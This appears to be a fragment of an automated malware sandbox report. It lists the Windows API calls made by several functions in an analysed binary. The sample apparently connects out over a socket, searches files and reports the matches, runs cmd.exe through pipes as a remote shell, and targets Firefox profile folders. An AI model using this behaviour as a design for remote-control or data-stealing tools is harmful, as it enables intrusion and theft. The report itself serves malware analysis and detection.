                                          0x00403076
                                          0x00403092
                                          0x00403099
                                          0x004030a9
                                          0x004030b9
                                          0x004030c3
                                          0x004030cb
                                          0x004030d9
                                          0x004030e5
                                          0x004030f1
                                          0x004030fa
                                          0x00403108
                                          0x00403112
                                          0x0040311b
                                          0x00403124
                                          0x0040312d
                                          0x00403136
                                          0x0040313f
                                          0x0040314a

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 00402C4A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,7313CB00,7313CB00), ref: 00402C67
                                          • socket.WS2_32(00000000,00000001,00000006), ref: 00402C7A
                                          • connect.WS2_32(00000000,00415278,00000010), ref: 00402C89
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchstarted,00415268,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CB8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CC8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CD8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CE2
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                            • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                            • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                            • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                            • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                            • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D06
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D12
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D1E
                                          • _CxxThrowException.MSVCRT(00000001,00411A80), ref: 00402D3E
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D4C
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D56
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D60
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 00402D86
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00402D90
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00402D97
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00402DA6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(searchwrongpath,?), ref: 00402DC5
                                          • _CxxThrowException.MSVCRT(00000002,00411A80), ref: 00402DE9
                                          • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00402DF8
                                          • wcscmp.MSVCRT ref: 00402E25
                                          • wcscmp.MSVCRT ref: 00402E3D
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041079C), ref: 00402E62
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00402E74
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00402E84
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E92
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E9E
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EAD
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EBF
                                            • Part of subcall function 00403183: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,75949F40), ref: 00403198
                                            • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,75949F40), ref: 004031A7
                                            • Part of subcall function 00403183: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031B1
                                            • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031BB
                                            • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                                            • Part of subcall function 00403183: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                                            • Part of subcall function 00403183: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                                            • Part of subcall function 00403183: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                                            • Part of subcall function 00403183: wcscmp.MSVCRT ref: 00403247
                                            • Part of subcall function 00403183: wcscmp.MSVCRT ref: 0040325F
                                            • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                                            • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                                            • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                                            • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                                            • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                                          • _CxxThrowException.MSVCRT(00000003,00411A80), ref: 00402EE6
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00411A80), ref: 00402EF1
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00402F0B
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00402F1D
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F2A
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F37
                                          • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00402F52
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00402F7F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402F89
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F95
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00402FC7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 00402FD7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 00402FE7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 00402FF1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403015
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403021
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040302D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403039
                                          • _CxxThrowException.MSVCRT(00000004,00411A80), ref: 00403059
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00411A80), ref: 00403064
                                          • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403076
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchfinished,00415268,?,00415268,?), ref: 00403099
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 004030A9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004030B9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004030C3
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                                            • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                                            • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                                            • Part of subcall function 00402504: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                                            • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 004025C8
                                            • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030E5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030F1
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030FA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403112
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040311B
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403124
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040312D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403136
                                          • atoi.MSVCRT ref: 00403101
                                            • Part of subcall function 00403474: _EH_prolog.MSVCRT ref: 00403479
                                            • Part of subcall function 00403474: closesocket.WS2_32(?), ref: 004034BB
                                            • Part of subcall function 00403474: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000000,7313CB00,7313CB00,?,?,0040C61E,00000000), ref: 004034CD
                                          • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0040314F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,00415278,00000010,00000000,00000001,00000006), ref: 00403157
                                          • atoi.MSVCRT ref: 0040315E
                                          • FindClose.KERNEL32(?), ref: 0040316F
                                          • ExitThread.KERNEL32 ref: 00403177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$Hstd@@V?$basic_string@$D@2@@0@$??0?$basic_string@V10@0@$?begin@?$basic_string@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@V10@@$??4?$basic_string@?data@?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$?empty@?$basic_string@?find@?$basic_string@A?$basic_string@ExitTerminateV12@closesocketconnectsocket
                                          • String ID: filefound$searchfinished$searchstarted$searchwrongpath
                                          • API String ID: 525724632-2241827744
                                          • Opcode ID: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                                          • Instruction ID: 37d5ccb0cac30d8a9bba9e41291a70e7b7d0e58fcafd169c2c2f7e39e65e0a14
                                          • Opcode Fuzzy Hash: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                                          • Instruction Fuzzy Hash: 97D11F72900119ABDB15EB60DD8EADE777CAF14305F0041BAF50AA2091EF795F89CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,7313CB00,?,0040AD3E,?), ref: 0040E8EC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,7313CB00,?,0040AD3E,?), ref: 0040E904
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0040AD3E,?), ref: 0040E911
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,cmd.exe,?,0040AD3E,?), ref: 0040E920
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\,?), ref: 0040E933
                                          • CreatePipe.KERNEL32 ref: 0040E95B
                                          • GetStdHandle.KERNEL32 ref: 0040E98B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000044,?), ref: 0040E9B3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040E9C3
                                          • CreateProcessA.KERNEL32(00000000,00000000), ref: 0040E9CB
                                          • Sleep.KERNEL32(?,000001F4), ref: 0040E9DC
                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0040E9F6
                                          • ReadFile.KERNEL32(?,?,0000C350,00000000,00000000), ref: 0040EA15
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040EA39
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EA43
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EA4F
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000), ref: 0040EA71
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000,73115DF0), ref: 0040EA8C
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000002), ref: 0040EA9F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAA9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EAB5
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000000), ref: 0040EAC1
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000001), ref: 0040EADA
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,-00000002), ref: 0040EAEE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAF8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB42
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410C1C), ref: 0040EB51
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EB5F
                                          • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,73115DF0), ref: 0040EB79
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040EB87
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EB90
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB99
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,00000000), ref: 0040EBA4
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 0040EBB8
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0040EC0B
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040EC16
                                          • CloseHandle.KERNEL32(?), ref: 0040EC25
                                          • CloseHandle.KERNEL32(?), ref: 0040EC2A
                                          • CloseHandle.KERNEL32(?), ref: 0040EC37
                                          • CloseHandle.KERNEL32(?), ref: 0040EC3C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EC4E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,?,0000000D,0000000A,00415B80,0000003E), ref: 0040EC69
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,00000000,?), ref: 0040EC76
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000,?), ref: 0040EC83
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,00000000,?), ref: 0040EC8F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040EC9A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECA3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECAC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECB5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECBE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@V01@V?$basic_string@$??0?$basic_string@?find@?$basic_string@HandleV01@@$??4?$basic_string@CloseD@1@@Hstd@@$?substr@?$basic_string@V10@V12@$??8std@@?c_str@?$basic_string@CreatePipeProcessY?$basic_string@$?length@?$basic_string@?rfind@?$basic_string@FileNamedObjectPeekReadSingleSleepTerminateV10@0@Wait
                                          • String ID: C:\$D$cmd.exe
                                          • API String ID: 868804582-2369035250
                                          • Opcode ID: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                                          • Instruction ID: 6ad45e127cb324f962e26fd75bd9daacbf5f14a3686954285d58c0458e4bac89
                                          • Opcode Fuzzy Hash: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                                          • Instruction Fuzzy Hash: 01C13E7190411DEFDB14DBA0DC98EEE7B79FB44304F1084BAF506A61A0DB795E85CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,74B06490,00000000), ref: 004057C9
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,74B06490,00000000), ref: 004057D6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,74B06490,00000000), ref: 004057E3
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?,?,74B06490,00000000), ref: 004057F5
                                          • getenv.MSVCRT ref: 00405801
